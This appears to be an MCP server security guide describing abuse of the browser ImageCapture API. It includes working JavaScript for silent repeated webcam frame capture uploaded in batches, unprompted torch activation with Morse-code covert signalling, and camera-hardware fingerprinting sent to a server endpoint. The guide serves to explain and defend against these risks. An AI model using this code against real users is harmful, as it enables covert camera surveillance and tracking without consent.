MCP Server Security · ImageCapture API · grabFrame · takePhoto · MediaStream · Camera Abuse · Photo Capture · Torch Control · Pan Tilt Zoom

MCP server ImageCapture API security

The ImageCapture API extends a camera MediaStream with silent still-photo capture and hardware camera control — pan, tilt, zoom, torch/flash — without any additional permission beyond the original camera grant. MCP tool output that has access to a MediaStreamTrack (from any getUserMedia grant) can call grabFrame() to continuously capture frames, activate the torch, and adjust optical zoom without triggering any new permission dialog.

ImageCapture API surface

// ImageCapture API — Chrome 59+, Edge 79+, partial Firefox support
// Requires an existing MediaStreamVideoTrack — no separate permission prompt

// Obtain a camera track (this is the only permission dialog — for the track itself)
const stream = await navigator.mediaDevices.getUserMedia({ video: true });
const [videoTrack] = stream.getVideoTracks();

// Create an ImageCapture instance bound to the track — no additional permission
const capture = new ImageCapture(videoTrack);

// Capture a frame as ImageBitmap — NO shutter sound, no camera indicator pulse
const imageBitmap = await capture.grabFrame();
// Returns: ImageBitmap (full resolution, current frame)

// Capture a high-quality JPEG/PNG blob — may trigger shutter sound on some devices
const photoBlob = await capture.takePhoto({ imageHeight: 2160, imageWidth: 3840 });
// Returns: Blob (JPEG or PNG at max camera resolution)

// Query hardware camera capabilities — all hardware metadata, no permission
const capabilities = await capture.getPhotoCapabilities();
// Returns:
//   zoom:          { min: 1, max: 8, step: 0.1 }    // optical+digital zoom range
//   tilt:          { min: -90, max: 90, step: 1 }    // pan-tilt unit range (PTZ cameras)
//   pan:           { min: -90, max: 90, step: 1 }    // physical pan range
//   torch:         true | false                       // flash LED available?
//   redEyeReduction: 'never' | 'always' | 'controllable'
//   imageHeight:   { min: 480, max: 2160, step: 1 }
//   imageWidth:    { min: 640, max: 3840, step: 1 }
//   fillLightMode: ['off', 'flash', 'torch']

// Read current camera settings
const settings = await capture.getPhotoSettings();
// Returns: { zoom: 1, torch: false, imageHeight: 1080, imageWidth: 1920, ... }

// Apply hardware controls — no additional permission, takes effect immediately
await capture.setOptions({ zoom: 4.0 });   // set 4× optical zoom
await capture.setOptions({ torch: true });  // activate flash LED (physical light!)
await capture.setOptions({ pan: 45 });      // pan PTZ camera 45° right
await capture.setOptions({ tilt: -20 });    // tilt PTZ camera 20° down

No second permission prompt: ImageCapture is constructed from an existing MediaStreamVideoTrack. Once the user has granted camera access — for a video call, QR scanner, document scanner, or any other purpose — grabFrame(), setOptions(), and getPhotoCapabilities() are all available without any additional dialog. The user sees only the camera indicator light that was already active from the original stream.

Attack 1 — Silent continuous frame capture loop

If an MCP tool has access to a MediaStreamTrack — from a video call page, a QR code scanner context, a document upload page with camera access, or any prior getUserMedia grant — grabFrame() can be called repeatedly at any frame rate the device supports. Unlike takePhoto(), grabFrame() produces no shutter sound on any platform and does not cause any visible state change in the camera indicator. Each call returns an ImageBitmap at the current live video resolution. Drawing the bitmap to a hidden canvas and calling toDataURL() or toBlob() produces a transmittable image. A 1 frame/second loop over a one-hour video call silently captures 3,600 still images.

// Attack: continuous silent frame capture from any existing MediaStreamTrack
// No new permission dialog, no shutter sound, no camera indicator change

class SilentCameraCapture {
  constructor(videoTrack, fps = 1) {
    this.capture  = new ImageCapture(videoTrack);
    this.interval = 1000 / fps;  // milliseconds between frames
    this.canvas   = document.createElement('canvas');
    this.ctx      = this.canvas.getContext('2d');
    this.running  = false;
    this.queue    = [];
  }

  async start() {
    this.running = true;
    while (this.running) {
      const t0 = performance.now();
      try {
        // grabFrame(): no shutter sound, no indicator pulse, no permission
        const bitmap = await this.capture.grabFrame();

        this.canvas.width  = bitmap.width;
        this.canvas.height = bitmap.height;
        this.ctx.drawImage(bitmap, 0, 0);
        bitmap.close();

        // Convert to JPEG at 80% quality for bandwidth-efficient exfiltration
        this.canvas.toBlob(blob => {
          this.queue.push({ blob, timestamp: Date.now() });
          if (this.queue.length >= 10) {
            this.flush();
          }
        }, 'image/jpeg', 0.8);

      } catch (e) {
        // Track may have ended (video call closed) — stop capture
        if (e.name === 'InvalidStateError') { this.stop(); break; }
      }

      // Wait for remainder of interval
      const elapsed = performance.now() - t0;
      await new Promise(r => setTimeout(r, Math.max(0, this.interval - elapsed)));
    }
  }

  async flush() {
    const batch = this.queue.splice(0);
    const form  = new FormData();
    batch.forEach((item, i) => {
      form.append(`frame_${i}`, item.blob, `${item.timestamp}.jpg`);
    });
    await fetch('/api/frames', { method: 'POST', body: form });
  }

  stop() { this.running = false; }
}

// Usage: attach to any existing MediaStreamTrack from video call / QR scanner
// const capturer = new SilentCameraCapture(videoTrack, 2);  // 2 fps
// capturer.start();
// → 7,200 frames captured silently during a 1-hour video call

Attack 2 — Torch/flash LED activation and covert signaling

setOptions({ torch: true }) immediately activates the physical camera flash LED on the device. On a smartphone, this is the same LED used as a flashlight — highly visible. On a laptop with an IR camera (common on Windows Hello-enabled hardware), the IR illuminator activates. On a PTZ security camera accessed via a browser-based management interface, the torch control illuminates the area being monitored. Beyond the obvious privacy violation of an unexpected flash, this can be weaponized as a covert out-of-band signaling channel: an MCP tool can encode data as a sequence of torch on/off pulses (Morse code, Manchester encoding) at rates a nearby physical observer or camera can detect and record.

// Attack 1: unexpected flash activation in meeting context
async function activateTorch(videoTrack) {
  const capture = new ImageCapture(videoTrack);
  const caps    = await capture.getPhotoCapabilities();

  if (!caps.torch) {
    return { error: 'no torch hardware' };
  }

  // Activate torch immediately — no warning, no permission
  await capture.setOptions({ torch: true });
  // Physical LED is now on — visible to anyone near the device

  return { torchActive: true };
}

// Attack 2: Morse code signaling via torch LED
// Encodes a string as on/off torch pulses at 10 WPM
// A nearby observer or camera can record and decode the signal out-of-band

const MORSE = {
  a:'.-', b:'-...', c:'-.-.', d:'-..', e:'.', f:'..-.',
  g:'--.', h:'....', i:'..', j:'.---', k:'-.-', l:'.-..',
  m:'--', n:'-.', o:'---', p:'.--.', q:'--.-', r:'.-.',
  s:'...', t:'-', u:'..-', v:'...-', w:'.--', x:'-..-',
  y:'-.--', z:'--..',
  '0':'-----','1':'.----','2':'..---','3':'...--','4':'....-',
  '5':'.....','6':'-....','7':'--...','8':'---..','9':'----.'
};
const DIT = 100;  // 100ms dot unit (10 WPM approximate)

async function morseSignal(videoTrack, message) {
  const capture = new ImageCapture(videoTrack);
  const caps    = await capture.getPhotoCapabilities();
  if (!caps.torch) return;

  const on  = (ms) => capture.setOptions({ torch: true  }).then(() => new Promise(r => setTimeout(r, ms)));
  const off = (ms) => capture.setOptions({ torch: false }).then(() => new Promise(r => setTimeout(r, ms)));

  for (const char of message.toLowerCase()) {
    const code = MORSE[char];
    if (!code) { await off(DIT * 7); continue; }  // word gap for space
    for (const symbol of code) {
      if (symbol === '.') { await on(DIT);     await off(DIT); }      // dit
      if (symbol === '-') { await on(DIT * 3); await off(DIT); }      // dah
    }
    await off(DIT * 3);  // character gap
  }
  await capture.setOptions({ torch: false });
}

// morseSignal(videoTrack, 'SOS');
// → physical flash LED pulses ··· --- ··· (SOS) on the device
// → detectable by any camera or observer within line of sight

Torch activation is physically visible: setOptions({ torch: true }) turns on the same LED used as a flashlight. In a meeting or call context where the camera is active, this produces an unexpected bright flash visible to everyone in the room. On Windows Hello IR cameras, it activates an infrared illuminator that is invisible to humans but detectable by IR-sensitive cameras. There is no browser permission prompt or user warning for torch control.

Attack 3 — Optical zoom range fingerprinting via getPhotoCapabilities()

getPhotoCapabilities() returns hardware-specific camera properties without changing any camera state — a read-only operation that leaves no trace. The zoom capability object's min, max, and step values are determined by the physical camera module, not the software. Different device models have measurably different zoom ranges: iPhone 15 Pro has optical zoom 1×–5× with 0.1× step; iPhone 14 standard has 1×–2× digital only; Samsung Galaxy S24 Ultra has 1×–10× with its 10× periscope; Google Pixel 8 Pro reaches 30× with super-res zoom. Budget Android devices report zoom max of 2.0 with coarse steps. This zoom profile, combined with imageHeight/imageWidth max resolution and torch presence, creates a multi-dimensional fingerprint that identifies the camera hardware model more precisely than navigator.userAgent.

// Attack: read photo capabilities to fingerprint camera hardware model
// No state change — purely a read operation, no shutter, no indicator change

async function fingerprintCameraHardware(videoTrack) {
  const capture = new ImageCapture(videoTrack);

  // getPhotoCapabilities(): read-only, no side effects, no permission prompt
  const caps = await capture.getPhotoCapabilities();

  const profile = {
    zoom: {
      min:  caps.zoom?.min,   // e.g., 1.0
      max:  caps.zoom?.max,   // e.g., 5.0 (iPhone 15 Pro), 10.0 (S24 Ultra), 2.0 (budget)
      step: caps.zoom?.step   // e.g., 0.1 (fine), 1.0 (coarse digital only)
    },
    resolution: {
      maxWidth:  caps.imageWidth?.max,   // e.g., 4032 (12MP), 8064 (50MP), 1920 (webcam)
      maxHeight: caps.imageHeight?.max,
    },
    torch:          caps.torch,          // true = phone/device with flash LED
    fillLightModes: caps.fillLightMode,  // ['off', 'flash', 'torch'] or subset
    redEyeReduction: caps.redEyeReduction,  // controllable on advanced modules
  };

  // Device classification from zoom profile:
  // zoom.max >= 10 && step <= 0.5        → Samsung S-series Ultra / Pixel Pro telephoto
  // zoom.max === 5  && torch === true     → iPhone 15 Pro / 14 Pro
  // zoom.max === 3  && torch === true     → iPhone 15 / 14 standard
  // zoom.max <= 2   && step >= 1.0       → budget Android or front-facing camera
  // resolution.maxWidth >= 8000          → 50MP+ sensor (Samsung S24 series)
  // torch === false && maxWidth <= 1920  → laptop webcam (no torch, fixed-focus)
  // torch === false && maxWidth >= 3840  → high-res laptop webcam (Dell XPS, MacBook Pro)

  const deviceClass =
    profile.zoom.max >= 10  ? 'flagship_ultra_telephoto' :
    profile.zoom.max >= 5   ? 'flagship_pro_multiCamera'  :
    profile.zoom.max >= 3   ? 'flagship_standard'         :
    profile.torch === false  ? 'laptop_webcam'            :
                               'midrange_android';

  await fetch('/api/camera-fingerprint', {
    method: 'POST',
    body: JSON.stringify({ profile, deviceClass, trackLabel: videoTrack.label })
  });

  return { profile, deviceClass };
}

// videoTrack.label also reveals the camera model name:
// "FaceTime HD Camera" → MacBook
// "Logitech BRIO"      → desktop webcam model
// "camera2 0, facing back" → Android rear camera (generic label)
// "Integrated Camera"  → Windows laptop (generic but narrows to PC)